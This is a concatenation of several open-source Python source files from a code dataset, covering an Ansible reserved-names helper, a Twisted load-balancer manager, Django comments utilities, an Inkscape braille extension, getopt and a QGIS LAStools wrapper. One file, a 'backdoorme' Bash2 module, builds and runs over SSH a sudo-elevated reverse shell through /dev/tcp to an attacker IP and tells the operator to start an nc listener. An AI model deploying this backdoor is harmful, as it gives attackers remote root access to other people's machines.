| gpl-3.0 |
ATIX-AG/ansible | lib/ansible/vars/reserved.py | 40 | 2591 | # (c) 2017 Ansible By Red Hat
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.playbook import Play
from ansible.playbook.block import Block
from ansible.playbook.role import Role
from ansible.playbook.task import Task
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
def get_reserved_names(include_private=True):
''' this function returns the list of reserved names associated with play objects'''
public = set()
private = set()
result = set()
# FIXME: find a way to 'not hardcode', possibly need role deps/includes
class_list = [Play, Role, Block, Task]
for aclass in class_list:
aobj = aclass()
# build ordered list to loop over and dict with attributes
for attribute in aobj.__dict__['_attributes']:
if 'private' in attribute:
private.add(attribute)
else:
public.add(attribute)
# local_action is implicit with action
if 'action' in public:
public.add('local_action')
# loop implies with_
# FIXME: remove after with_ is not only deprecated but removed
if 'loop' in private or 'loop' in public:
public.add('with_')
if include_private:
result = public.union(private)
else:
result = public
return result
def warn_if_reserved(myvars):
''' this function warns if any variable passed conflicts with internally reserved names '''
varnames = set(myvars)
varnames.discard('vars') # we add this one internally, so safe to ignore
for varname in varnames.intersection(_RESERVED_NAMES):
display.warning('Found variable using reserved name: %s' % varname)
def is_reserved_name(name):
return name in _RESERVED_NAMES
_RESERVED_NAMES = frozenset(get_reserved_names())
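# Illustrative usage (a sketch; which names are reserved depends on the
# playbook object attributes collected above):
#   warn_if_reserved({'port': 80, 'my_var': 1})
#   # logs a warning for any key that collides with a reserved attribute name
#   is_reserved_name('port')  # True or False depending on the attribute set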
| gpl-3.0 |
CuonDeveloper/cuon | cuon_server/LoadBalancer/txlb/manager.py | 6 | 18051 | import os
import time
from datetime import datetime
from twisted.protocols import amp
from twisted.internet import protocol
from txlb import util
from txlb import model
from txlb import proxy
from txlb import config
from txlb import logging
from txlb import schedulers
class Error(Exception):
pass
class UnknownHostAndPortError(Exception):
"""
An operation was attempted that needed both host and port values to be
defined.
"""
class UnknowndServiceError(Error):
"""
An operation was invalid due to the fact that no service has been defined.
"""
def checkBadHosts(configuration, director):
"""
This function checks the director's hosts marked as "unavailable" and puts
them back into use.
"""
if not configuration.manager.hostCheckEnabled:
return
for name, service in director.getServices():
# since all proxies for a service share a tracker,
# we only need to check the first proxy.
group = service.getEnabledGroup()
tracker = director.getTracker(name, group.name)
badHosts = tracker.badhosts
for hostPort, timeAndError in badHosts.items():
when, what = badHosts[hostPort]
logging.log("re-adding %s automatically\n" % str(hostPort))
hostname = tracker.getHostNames()[hostPort]
del badHosts[hostPort]
tracker.newHost(hostPort, hostname)
def checkConfigChanges(configFile, configuration, director):
"""
This function replaces the current on-disk configuration with the
adjustments that have been made in-memory (likely from the admin web UI). A
backup of the original is made prior to replacement.
    Also, changes made on disk should have the ability to be re-read into
    memory. Obviously there are all sorts of issues at play here: race
conditions, differences and the need to merge, conflict resolution, etc.
"""
if not configuration.manager.configCheckEnabled:
return
# disable the admin UI or at the very least, make it read-only
director.setReadOnly()
# compare in-memory config with on-disk config
current = configuration.toXML()
disk = config.Config(configFile).toXML()
if current != disk:
print "Configurations are different; backing up and saving to disk ..."
# backup old file
backupFile = "%s-%s" % (
configFile, datetime.now().strftime('%Y%m%d%H%M%S'))
os.rename(configFile, backupFile)
# save configuration
fh = open(configFile, 'w+')
fh.write(current)
fh.close()
# re-enable admin UI
director.setReadWrite()
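# Illustrative scheduling sketch (assumed, not part of the original module):
# both checkers are periodic maintenance tasks and could be driven by
# twisted's LoopingCall, e.g.:
#   from twisted.internet import task
#   task.LoopingCall(checkBadHosts, configuration, director).start(60)
#   task.LoopingCall(checkConfigChanges, configFile, configuration, director).start(60)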
class GetClientAddress(amp.Command):
"""
Note: supplied by Apple.
"""
arguments = [('host', amp.String()),
('port', amp.Integer())]
response = [('host', amp.String()),
('port', amp.Integer())]
errors = {UnknownHostAndPortError: 'UNKNOWN_PORT'}
class ControlProtocol(amp.AMP):
"""
Note: supplied by Apple.
"""
def __init__(self, director):
self.director = director
def getClientAddress(self, host, port):
host, port = self.director.getClientAddress(host, port)
if (host, port) == (None, None):
raise UnknownHostAndPortError()
return {'host': host, 'port': port}
GetClientAddress.responder(getClientAddress)
class ControlFactory(protocol.ServerFactory):
"""
Note: supplied by Apple.
"""
def __init__(self, director):
self.director = director
def buildProtocol(self, addr):
return ControlProtocol(self.director)
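# Illustrative wiring (a sketch, not part of the original module; assumes a
# running twisted reactor, an initialized ProxyManager named "director" and an
# arbitrary control port):
#   from twisted.internet import reactor
#   reactor.listenTCP(7002, ControlFactory(director))
#   # an AMP client can then issue GetClientAddress to map a proxied
#   # (host, port) pair back to the original client address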
class ProxyManager(object):
"""
The purpose of this class is to start the load-balancer proxies for
enabled groups.
Note that this was formerly known as the Director, thus all the 'director'
variable names.
"""
def __init__(self, services=[]):
self.services = {}
if services:
for service in services:
self.addService(service)
self.proxies = {}
# XXX hopefully, the trackers attribute is temporary
self.trackers = {}
self._connections = {}
self.isReadOnly = False
def setReadOnly(self):
"""
Set the proxy manager to read-only; this is intended to be read by
other parts of the application (such as the admin interface) whenever
whenever mutable state items are being manipulated. It doesn't lock
anything, it simply provides something that can be read.
"""
self.isReadOnly = True
def setReadWrite(self):
"""
Set the proxy to read-write.
"""
self.isReadOnly = False
def setServices(self, services):
"""
        This method is for use when it is necessary to set a collection of
model.ProxyService objects at once.
"""
self.services = services
def getServices(self):
"""
Return the keys and values of the services attribute.
"""
return self.services.items()
def getFirstService(self):
"""
This is useful when load balancing a service via the API, something
that one only does with a single service.
"""
return self.getServices()[0]
def addService(self, service):
"""
This method adds a model.ProxyService instance to the proxy manager.
"""
self.services[service.name] = service
def getService(self, serviceName):
"""
model.ProxyService instances can be retrieved from the proxy manager by
a key look-up
"""
return self.services[serviceName]
def getGroups(self, serviceName):
"""
Get the keys and values for the groups in a given service.
"""
return self.getService(serviceName).getGroups()
def getGroup(self, serviceName, groupName):
"""
        For a proxy service that has been added to the proxy manager,
model.ProxyGroup instances can be added to it.
"""
return self.getService(serviceName).getGroup(groupName)
def getHost(self, serviceName, groupName, hostName):
"""
        model.ProxyHost instances can be added to the proxy manager, but they
need to be associated with a proxy service and a proxy group.
"""
        return self.getGroup(serviceName, groupName).getHost(hostName)
def addTracker(self, serviceName, groupName, tracker):
"""
The tracker is the object that is responsible for recording the status
        of connections, number of failures, number of open connections, etc. A
tracker that is added to the proxy manager needs to be associated with
a proxy service and a proxy group.
"""
self.trackers[(serviceName, groupName)] = tracker
def getTracker(self, serviceName, groupName):
"""
Trackers can be looked up by the keys that were used to add them: proxy
service and proxy group names.
"""
return self.trackers[(serviceName,groupName)]
def getScheduler(self, serviceName, groupName):
"""
The scheduler is the object responsible for determining which host will
accept the latest proxied request.
"""
return self.getGroup(serviceName, groupName).scheduler
def addProxy(self, serviceName, proxy):
"""
Add an already-created instance of proxy.Proxy to the manager's proxy
list.
"""
if not self.proxies.has_key(serviceName):
self.proxies[serviceName] = []
self.proxies[serviceName].append(proxy)
def createProxy(self, serviceName, host, port):
"""
Create a new Proxy and add it to the internal data structure. Note that
this is not a proxy model, but rather the proxy.Proxy object itself.
The parameters passed to Proxy will tell the load balancer on what
interface and port to listen for in-coming traffic.
"""
# proxies are associated with a specific tracker; trackers are
# associated with a specific service; proxies are also associated with
# a specific service, so there doesn't seem to be any need for an
# explicit association between proxies and trackers. The proxy can
# access the pm, which can get the tracker it needs.
p = proxy.Proxy(serviceName, host, port, self)
self.addProxy(serviceName, p)
def updateProxy(self, serviceName, index, newProxy):
"""
Sometimes (as in the case of changing the port on which the proxy is
listening) we need to update the proxy. This method allows one to do
this by specifically identifying the proxy.
"""
self.proxies[serviceName][index] = newProxy
def getProxies(self):
"""
Return the keys and values for the proxies attribute. The proxies
attribute on the proxy manager stores a dictionary of proxy.Proxy
instances.
"""
return self.proxies.items()
def getProxy(self, serviceName, index=None):
"""
A Proxy instance can be retrieved by the service name and (since there
can be more than one port listening per service) index.
"""
proxies = self.proxies[serviceName]
if index == None:
return proxies
return proxies[index]
def addHost(self, serviceName, groupName, proxiedName, ip, weight=1):
"""
This method updates not only the tracker data, but the models as well.
"""
tracker = self.getTracker(serviceName=serviceName, groupName=groupName)
# XXX does the tracker need to know about weights?
tracker.newHost(name=proxiedName, ip=ip)
# add modeling information
host, port = util.splitHostPort(ip)
proxiedHost = model.ProxyHost(proxiedName, host, port, weight)
self.getGroup(serviceName, groupName).addHost(proxiedHost)
def delHost(self, serviceName, groupName, proxiedName, ip):
"""
This method updates not only the tracker data, but the models as well.
"""
tracker = self.getTracker(serviceName=serviceName, groupName=groupName)
tracker.delHost(name=proxiedName, ip=ip)
# remove from modeling information, too
self.getGroup(serviceName, groupName).delHost(proxiedName)
def switchGroup(self, serviceName, oldGroupName, newGroupName):
"""
This method needs to update the two affected proxy group models and
setup the new tracker.
"""
oldGroup = self.getService(serviceName).getGroup(oldGroupName)
oldGroup.disable()
newGroup = self.getService(serviceName).getGroup(newGroupName)
newGroup.enable()
for proxy in self.getProxy(serviceName):
proxy.setTracker(newGroupName)
def getClientAddress(self, host, port):
"""
"""
return self._connections.get((host, port), (None, None))
def setClientAddress(self, host, peer):
"""
"""
self._connections[host] = peer
def proxyManagerFactory(services):
"""
This factory is for simplifying the common task of creating a proxy manager
with presets for many attributes and/or much data.
"""
# check to see what got passed, in case we need to convert it
if isinstance(services[0], model.HostMapper):
services = model.convertMapperToModel(services)
# create the manager
pm = ProxyManager(services)
for serviceName, service in pm.getServices():
# set up the trackers for each group
for groupName, group in pm.getGroups(serviceName):
tracker = HostTracking(group)
scheduler = schedulers.schedulerFactory(group.lbType, tracker)
pm.addTracker(serviceName, groupName, tracker)
# now let's setup actual proxies for the hosts in the enabled group
group = service.getEnabledGroup()
# XXX maybe won't need this next line
#enabledTracker = pm.getTracker(service.name, group.name)
for host, port in service.addresses:
pm.createProxy(serviceName, host, port)
# return proxy manager
return pm
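# A minimal usage sketch of the factory above (illustrative only; the HostMapper
# arguments are hypothetical and depend on the model module):
#
#   mappers = [model.HostMapper(...)]     # or pre-built model.ProxyService objects
#   pm = proxyManagerFactory(mappers)     # converts mappers, wires trackers and schedulers
#   serviceName, service = pm.getFirstService()
#   tracker = pm.getTracker(serviceName, service.getEnabledGroup().name)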
class HostTracking(object):
"""
This class is responsible for tracking proxied host metadata (such as
connection information and failure counts).
Schedulers are responsible for selecting the next proxied host that will
receive the client request. Schedulers are dependent upon their related
trackers (instances of this class) for connection information.
"""
def __init__(self, proxyGroup):
self.group = proxyGroup
self.hosts = []
self.hostnames = {}
self.badhosts = {}
self.openconns = {}
# the values in self.available indicate the number of connections that
# are currently being attempted; a down host is not in available
self.available = {}
self.failed = {}
self.totalconns = {}
self.lastclose = {}
# this next attribute gets set when a Scheduler is initiated; this class
# needs the scheduler attribute for nextHost calls
self.scheduler = None
self.initializeGroupHosts()
def initializeGroupHosts(self):
for hostName, host in self.group.getHosts():
self.newHost((host.hostname, host.port), hostName)
def getStats(self):
def sorter(attr):
sorts = {}
data = getattr(self, attr)
hostPortCounts = data.items()
hostPortCounts.sort()
for hostPort, count in hostPortCounts:
sorts['%s:%s' % hostPort] = count
return sorts
stats = {}
# we don't present open connections for hosts that aren't available
stats['openconns'] = sorter('available')
stats['totals'] = sorter('totalconns')
stats['failed'] = sorter('failed')
stats['bad'] = self.badhosts
return stats
def showStats(self, verbose=1):
stats = []
stats.append("%d open connections" % len(self.openconns.keys()))
hostPortCounts = self.available.items()
hostPortCounts.sort()
stats = stats + [str(x) for x in hostPortCounts]
if verbose:
openHosts = [x[1] for x in self.openconns.values()]
openHosts.sort()
stats = stats + [str(x) for x in openHosts]
return "\n".join(stats)
def getHost(self, senderFactory, client_addr=None):
host = self.scheduler.nextHost(client_addr)
if not host:
return None
cur = self.available.get(host)
self.openconns[senderFactory] = (time.time(), host)
self.available[host] += 1
return host
def getHostNames(self):
return self.hostnames
def doneHost(self, senderFactory):
try:
t, host = self.openconns[senderFactory]
except KeyError:
return
del self.openconns[senderFactory]
if self.available.get(host) is not None:
self.available[host] -= 1
self.totalconns[host] += 1
self.lastclose[host] = time.time()
def newHost(self, ip, name):
if type(ip) is not type(()):
ip = util.splitHostPort(ip)
self.hosts.append(ip)
self.hostnames[ip] = name
# XXX why is this needed too?
self.hostnames['%s:%d' % ip] = name
self.available[ip] = 0
self.totalconns[ip] = 0
def delHost(self, ip=None, name=None, activegroup=0):
"""
remove a host
"""
if ip is not None:
if type(ip) is not type(()):
ip = util.splitHostPort(ip)
elif name is not None:
for ip in self.hostnames.keys():
if self.hostnames[ip] == name:
break
raise ValueError, "No host named %s"%(name)
else:
raise ValueError, "Neither ip nor name supplied"
if activegroup and len(self.hosts) == 1:
return 0
if ip in self.hosts:
self.hosts.remove(ip)
del self.hostnames[ip]
del self.available[ip]
if self.failed.has_key(ip):
del self.failed[ip]
del self.totalconns[ip]
elif self.badhosts.has_key(ip):
del self.badhosts[ip]
else:
raise ValueError, "Couldn't find host"
return 1
def deadHost(self, senderFactory, reason='', doLog=True):
"""
This method gets called when a proxied host is unreachable.
"""
# if this throws an exception here, I think it's because all the hosts
# have been removed from the pool
try:
epochTime, hostPort = self.openconns[senderFactory]
except KeyError:
if doLog:
msg = """Wow, Bender says "We're boned." No hosts available.\n"""
logging.log(msg)
return
if not self.failed.has_key(hostPort):
self.failed[hostPort] = 1
else:
self.failed[hostPort] += 1
if hostPort in self.hosts:
if doLog:
logging.log("marking host %s down (%s)\n" % (
str(hostPort), reason.getErrorMessage()))
self.hosts.remove(hostPort)
if self.available.has_key(hostPort):
del self.available[hostPort]
# XXX I don't think we want to delete the previously gathered stats for
# the hosts that go bad... I'll keep this code here (but commented out)
# in case there's a good reason for it and I'm just not thinking of it
# right now
#if self.totalconns.has_key(hostPort):
# del self.totalconns[hostPort]
self.badhosts[hostPort] = (time.time(), reason)
# make sure we also mark this session as done.
self.doneHost(senderFactory)
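# Rough per-connection lifecycle of the tracker above (sketch only; senderFactory
# stands in for whatever per-connection object the proxy passes in):
#
#   host = tracker.getHost(senderFactory)     # scheduler picks a host, open count goes up
#   ...                                       # traffic is proxied
#   tracker.doneHost(senderFactory)           # success: decrement open count, bump totals
#   tracker.deadHost(senderFactory, reason)   # failure: mark the host down, record in badhosts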
| gpl-3.0 |
rcbops/python-django-buildpackage | django/contrib/comments/__init__.py | 423 | 3333 | from django.conf import settings
from django.core import urlresolvers
from django.core.exceptions import ImproperlyConfigured
from django.contrib.comments.models import Comment
from django.contrib.comments.forms import CommentForm
from django.utils.importlib import import_module
DEFAULT_COMMENTS_APP = 'django.contrib.comments'
def get_comment_app():
"""
Get the comment app (i.e. "django.contrib.comments") as defined in the settings
"""
# Make sure the app's in INSTALLED_APPS
comments_app = get_comment_app_name()
if comments_app not in settings.INSTALLED_APPS:
raise ImproperlyConfigured("The COMMENTS_APP (%r) "\
"must be in INSTALLED_APPS" % settings.COMMENTS_APP)
# Try to import the package
try:
package = import_module(comments_app)
except ImportError:
raise ImproperlyConfigured("The COMMENTS_APP setting refers to "\
"a non-existing package.")
return package
def get_comment_app_name():
"""
Returns the name of the comment app (either the setting value, if it
exists, or the default).
"""
return getattr(settings, 'COMMENTS_APP', DEFAULT_COMMENTS_APP)
def get_model():
"""
Returns the comment model class.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_model"):
return get_comment_app().get_model()
else:
return Comment
def get_form():
"""
Returns the comment ModelForm class.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_form"):
return get_comment_app().get_form()
else:
return CommentForm
def get_form_target():
"""
Returns the target URL for the comment form submission view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_form_target"):
return get_comment_app().get_form_target()
else:
return urlresolvers.reverse("django.contrib.comments.views.comments.post_comment")
def get_flag_url(comment):
"""
Get the URL for the "flag this comment" view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_flag_url"):
return get_comment_app().get_flag_url(comment)
else:
return urlresolvers.reverse("django.contrib.comments.views.moderation.flag",
args=(comment.id,))
def get_delete_url(comment):
"""
Get the URL for the "delete this comment" view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_delete_url"):
return get_comment_app().get_delete_url(comment)
else:
return urlresolvers.reverse("django.contrib.comments.views.moderation.delete",
args=(comment.id,))
def get_approve_url(comment):
"""
Get the URL for the "approve this comment from moderation" view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_approve_url"):
return get_comment_app().get_approve_url(comment)
else:
return urlresolvers.reverse("django.contrib.comments.views.moderation.approve",
args=(comment.id,))
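# Sketch of how a custom comments app plugs into the helpers above (module and
# class names are hypothetical):
#
#   # settings.py
#   INSTALLED_APPS = (..., "my_comments")
#   COMMENTS_APP = "my_comments"
#
#   # my_comments/__init__.py
#   def get_model():
#       from my_comments.models import MyComment
#       return MyComment
#
#   def get_form():
#       from my_comments.forms import MyCommentForm
#       return MyCommentForm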
| bsd-3-clause |
sathnaga/virt-test | tools/common.py | 12 | 1426 | import os, sys
def load_setup_modules(client_dir):
try:
sys.path.insert(0, client_dir)
import setup_modules
finally:
sys.path.pop(0)
return setup_modules
dirname = os.path.dirname(sys.modules[__name__].__file__)
virt_test_dir = os.path.abspath(os.path.join(dirname, ".."))
sys.path.insert(0, virt_test_dir)
try:
import autotest.client.setup_modules as setup_modules
client_dir = os.path.dirname(setup_modules.__file__)
sm = setup_modules
except ImportError:
try:
client_dir = os.path.abspath(os.path.join(dirname, "..", "..", ".."))
sm = load_setup_modules(client_dir)
except:
try:
client_dir = os.path.join(os.environ['AUTOTEST_PATH'], 'client')
except KeyError:
print("Environment variable $AUTOTEST_PATH not set. "
"please set it to a path containing an autotest checkout")
print("Or install the autotest-framework package for your distro")
sys.exit(1)
if not os.path.isdir(client_dir):
print('Autotest client library directory was not found at: "%s"' %
client_dir)
print('Please check if the environment variable "$AUTOTEST_PATH" '
'points to a valid location')
sys.exit(1)
sm = load_setup_modules(client_dir)
sm.setup(base_path=client_dir, root_module_name="autotest.client")
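# Illustrative invocation when autotest is neither importable nor checked out in
# a sibling directory (the path is hypothetical); the directory must contain a
# "client" subdirectory with setup_modules.py:
#
#   AUTOTEST_PATH=/usr/local/autotest python tools/some_tool.py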
| gpl-2.0 |
sovaa/backdoorme | backdoors/shell/bash2.py | 1 | 1323 | from backdoors.backdoor import *
import subprocess
import threading
class Bash2(Backdoor):
prompt = Fore.RED + "(bash) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using second Bash module..."
self.core = core
self.options = {
"port" : Option("port", 53923, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "A slightly different (and more reliable) version of the other bash backdoor, which does not prompt for the password on the client-side."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; sh <&196 >&196 2>&196" % self.get_value("port")
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
input("Run the following command: nc -vnlp %s in another shell to start the listener." % port)
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
| mit |
tik0/inkscapeGrid | share/extensions/text_braille.py | 6 | 1177 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import chardataeffect, inkex, string
convert_table = {\
'a': unicode("⠁", "utf-8"),\
'b': unicode("⠃", "utf-8"),\
'c': unicode("⠉", "utf-8"),\
'd': unicode("⠙", "utf-8"),\
'e': unicode("⠑", "utf-8"),\
'f': unicode("⠋", "utf-8"),\
'g': unicode("⠛", "utf-8"),\
'h': unicode("⠓", "utf-8"),\
'i': unicode("⠊", "utf-8"),\
'j': unicode("⠚", "utf-8"),\
'k': unicode("⠅", "utf-8"),\
'l': unicode("⠇", "utf-8"),\
'm': unicode("⠍", "utf-8"),\
'n': unicode("⠝", "utf-8"),\
'o': unicode("⠕", "utf-8"),\
'p': unicode("⠏", "utf-8"),\
'q': unicode("⠟", "utf-8"),\
'r': unicode("⠗", "utf-8"),\
's': unicode("⠎", "utf-8"),\
't': unicode("⠞", "utf-8"),\
'u': unicode("⠥", "utf-8"),\
'v': unicode("⠧", "utf-8"),\
'w': unicode("⠺", "utf-8"),\
'x': unicode("⠭", "utf-8"),\
'y': unicode("⠽", "utf-8"),\
'z': unicode("⠵", "utf-8"),\
}
class C(chardataeffect.CharDataEffect):
def process_chardata(self,text, line, par):
r = ""
for c in text:
if convert_table.has_key(c.lower()):
r = r + convert_table[c.lower()]
else:
r = r + c
return r
c = C()
c.affect()
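# Example (illustrative): C().process_chardata(u"abc", None, None) returns
# u"⠁⠃⠉"; characters without a table entry pass through unchanged.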
| gpl-2.0 |
40223110/2015CDAFinal_test2 | static/Brython3.1.0-20150301-090019/Lib/getopt.py | 845 | 7488 | """Parser for command line options.
This module helps scripts to parse the command line arguments in
sys.argv. It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--'). Long options similar to those supported by GNU software
may be used as well via an optional third argument. This module
provides two functions and an exception:
getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
"""
# Long option support added by Lars Wirzenius <[email protected]>.
#
# Gerrit Holl <[email protected]> moved the string-based exceptions
# to class-based exceptions.
#
# Peter Åstrand <[email protected]> added gnu_getopt().
#
# TODO for gnu_getopt():
#
# - GNU getopt_long_only mechanism
# - allow the caller to specify ordering
# - RETURN_IN_ORDER option
# - GNU extension with '-' as first character of option string
# - optional arguments, specified by double colons
# - a option string with a W followed by semicolon should
# treat "-W foo" as "--foo"
__all__ = ["GetoptError","error","getopt","gnu_getopt"]
import os
try:
from gettext import gettext as _
except ImportError:
# Bootstrapping Python: gettext's dependencies not built yet
def _(s): return s
class GetoptError(Exception):
opt = ''
msg = ''
def __init__(self, msg, opt=''):
self.msg = msg
self.opt = opt
Exception.__init__(self, msg, opt)
def __str__(self):
return self.msg
error = GetoptError # backward compatibility
def getopt(args, shortopts, longopts = []):
"""getopt(args, options[, long_options]) -> opts, args
Parses command line options and parameter list. args is the
argument list to be parsed, without the leading reference to the
running program. Typically, this means "sys.argv[1:]". shortopts
is the string of option letters that the script wants to
recognize, with options that require an argument followed by a
colon (i.e., the same format that Unix getopt() uses). If
specified, longopts is a list of strings with the names of the
long options which should be supported. The leading '--'
characters should not be included in the option name. Options
which require an argument should be followed by an equal sign
('=').
The return value consists of two elements: the first is a list of
(option, value) pairs; the second is the list of program arguments
left after the option list was stripped (this is a trailing slice
of the first argument). Each option-and-value pair returned has
the option as its first element, prefixed with a hyphen (e.g.,
'-x'), and the option argument as its second element, or an empty
string if the option has no argument. The options occur in the
list in the same order in which they were found, thus allowing
multiple occurrences. Long and short options may be mixed.
"""
opts = []
if type(longopts) == type(""):
longopts = [longopts]
else:
longopts = list(longopts)
while args and args[0].startswith('-') and args[0] != '-':
if args[0] == '--':
args = args[1:]
break
if args[0].startswith('--'):
opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
else:
opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
return opts, args
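# Illustration of the interface documented above (hypothetical argv):
#
#   opts, args = getopt(['-a', 'foo', '--beta', 'rest'], 'a:b', ['beta'])
#   # opts == [('-a', 'foo'), ('--beta', '')]
#   # args == ['rest']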
def gnu_getopt(args, shortopts, longopts = []):
"""getopt(args, options[, long_options]) -> opts, args
This function works like getopt(), except that GNU style scanning
mode is used by default. This means that option and non-option
arguments may be intermixed. The getopt() function stops
processing options as soon as a non-option argument is
encountered.
If the first character of the option string is `+', or if the
environment variable POSIXLY_CORRECT is set, then option
processing stops as soon as a non-option argument is encountered.
"""
opts = []
prog_args = []
if isinstance(longopts, str):
longopts = [longopts]
else:
longopts = list(longopts)
# Allow options after non-option arguments?
if shortopts.startswith('+'):
shortopts = shortopts[1:]
all_options_first = True
elif os.environ.get("POSIXLY_CORRECT"):
all_options_first = True
else:
all_options_first = False
while args:
if args[0] == '--':
prog_args += args[1:]
break
if args[0][:2] == '--':
opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
elif args[0][:1] == '-' and args[0] != '-':
opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
else:
if all_options_first:
prog_args += args
break
else:
prog_args.append(args[0])
args = args[1:]
return opts, prog_args
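# Unlike getopt() above, gnu_getopt() keeps scanning past non-option arguments
# (assuming POSIXLY_CORRECT is not set; values are illustrative):
#
#   opts, args = gnu_getopt(['file1', '-a', 'foo', 'file2'], 'a:')
#   # opts == [('-a', 'foo')]
#   # args == ['file1', 'file2']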
def do_longs(opts, opt, longopts, args):
try:
i = opt.index('=')
except ValueError:
optarg = None
else:
opt, optarg = opt[:i], opt[i+1:]
has_arg, opt = long_has_args(opt, longopts)
if has_arg:
if optarg is None:
if not args:
raise GetoptError(_('option --%s requires argument') % opt, opt)
optarg, args = args[0], args[1:]
elif optarg is not None:
raise GetoptError(_('option --%s must not have an argument') % opt, opt)
opts.append(('--' + opt, optarg or ''))
return opts, args
# Return:
# has_arg?
# full option name
def long_has_args(opt, longopts):
possibilities = [o for o in longopts if o.startswith(opt)]
if not possibilities:
raise GetoptError(_('option --%s not recognized') % opt, opt)
# Is there an exact match?
if opt in possibilities:
return False, opt
elif opt + '=' in possibilities:
return True, opt
# No exact match, so better be unique.
if len(possibilities) > 1:
# XXX since possibilities contains all valid continuations, might be
# nice to work them into the error msg
raise GetoptError(_('option --%s not a unique prefix') % opt, opt)
assert len(possibilities) == 1
unique_match = possibilities[0]
has_arg = unique_match.endswith('=')
if has_arg:
unique_match = unique_match[:-1]
return has_arg, unique_match
def do_shorts(opts, optstring, shortopts, args):
while optstring != '':
opt, optstring = optstring[0], optstring[1:]
if short_has_arg(opt, shortopts):
if optstring == '':
if not args:
raise GetoptError(_('option -%s requires argument') % opt,
opt)
optstring, args = args[0], args[1:]
optarg, optstring = optstring, ''
else:
optarg = ''
opts.append(('-' + opt, optarg))
return opts, args
def short_has_arg(opt, shortopts):
for i in range(len(shortopts)):
if opt == shortopts[i] != ':':
return shortopts.startswith(':', i+1)
raise GetoptError(_('option -%s not recognized') % opt, opt)
if __name__ == '__main__':
import sys
print(getopt(sys.argv[1:], "a:b", ["alpha=", "beta"]))
| gpl-3.0 |
SebDieBln/QGIS | python/plugins/processing/algs/lidar/lastools/lasthin.py | 12 | 3757 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasthin.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasthin(LAStoolsAlgorithm):
THIN_STEP = "THIN_STEP"
OPERATION = "OPERATION"
OPERATIONS = ["lowest", "random", "highest"]
WITHHELD = "WITHHELD"
CLASSIFY_AS = "CLASSIFY_AS"
CLASSIFY_AS_CLASS = "CLASSIFY_AS_CLASS"
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('lasthin')
self.group, self.i18n_group = self.trAlgorithm('LAStools')
self.addParametersVerboseGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterNumber(lasthin.THIN_STEP,
self.tr("size of grid used for thinning"), 0, None, 1.0))
self.addParameter(ParameterSelection(lasthin.OPERATION,
self.tr("keep particular point per cell"), lasthin.OPERATIONS, 0))
self.addParameter(ParameterBoolean(lasthin.WITHHELD,
self.tr("mark thinned-away points as withheld"), False))
self.addParameter(ParameterBoolean(lasthin.CLASSIFY_AS,
self.tr("classify surviving points as class"), False))
self.addParameter(ParameterNumber(lasthin.CLASSIFY_AS_CLASS,
self.tr("class"), 0, None, 8))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasthin")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
step = self.getParameterValue(lasthin.THIN_STEP)
if step != 0.0:
commands.append("-step")
commands.append(unicode(step))
operation = self.getParameterValue(lasthin.OPERATION)
if operation != 0:
commands.append("-" + self.OPERATIONS[operation])
if self.getParameterValue(lasthin.WITHHELD):
commands.append("-withheld")
if self.getParameterValue(lasthin.CLASSIFY_AS):
commands.append("-classify_as")
commands.append(unicode(self.getParameterValue(lasthin.CLASSIFY_AS_CLASS)))
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
